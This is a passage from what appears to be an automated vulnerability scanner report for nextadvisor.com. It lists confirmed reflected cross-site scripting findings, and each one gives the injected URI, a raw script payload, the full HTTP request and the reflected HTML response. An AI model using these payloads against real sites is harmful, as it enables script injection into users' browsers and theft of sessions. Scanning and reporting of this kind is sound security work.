"none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/identity_theft_protection_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Identity Theft Protection FAQ</h1> <p>Frequently Asked Questions about Identity Theft Protection</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Identity Theft Protection:</strong></p></span> <form 
action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="identity_theft_protection_services"> <input type="hidden" name="FieldData4" 
value="[long keyword string omitted]"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=..

/internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00025B)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00025B)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00025B)</script>

Request

GET /internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00025B)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/internet_fax/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:45 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6640
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", internet fax, online fax, internetfax, faxing, internet faxing, online faxing, rapidfax, MyFax, MetroFax, Nextiva Fax, RingCentral, GoDaddy, eFax, RapidFax" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/internet_fax/'"--></style></script><script>netsparker(0x00025B)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> 
<!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00025B)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && 
showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/internet_fax_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Internet Fax FAQ</h1> <p>Frequently Asked Questions about Internet Fax</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Internet Fax:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input 
type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="internet_fax"> <input type="hidden" name="FieldData4" 
value="[long keyword string omitted]"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=..

/internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000266)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000266)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsp..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000266)</script>

Request

GET /internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000266)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/internet_fax/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6657
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", internet fax, online fax, internetfax, faxing, internet faxing, online faxing, rapidfax, MyFax, MetroFax, Nextiva Fax, RingCentral, GoDaddy, eFax, RapidFax" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/internet_fax/index.php'"--></style></script><script>netsparker(0x000266)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content 
Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option 
value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000266)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && 
showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/internet_fax_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Internet Fax FAQ</h1> <p>Frequently Asked Questions about Internet Fax</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Internet Fax:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" 
value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="internet_fax"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
href="/link.php?kw=..
- /online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000285)%3C/script%3E

/online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000285)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enets..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000285)</script>

Request

GET /online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_backup_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6678
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", best online backup, online backup, file backup, hard drive backup, Carbonite, Mozy, SugarSync, IDrive, ElephantDrive, Norton Online Backup, IBackup" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_backup_services/'"--></style></script><script>netsparker(0x000285)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> 
<!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000285)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="/online_backup_services/compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="/online_backup_services/compare_mac.php">Mac Online Backup</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var 
formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_backup_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Backup & Cloud Storage FAQ</h1> <p>Frequently Asked Questions about Online Backup & Cloud Storage</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; 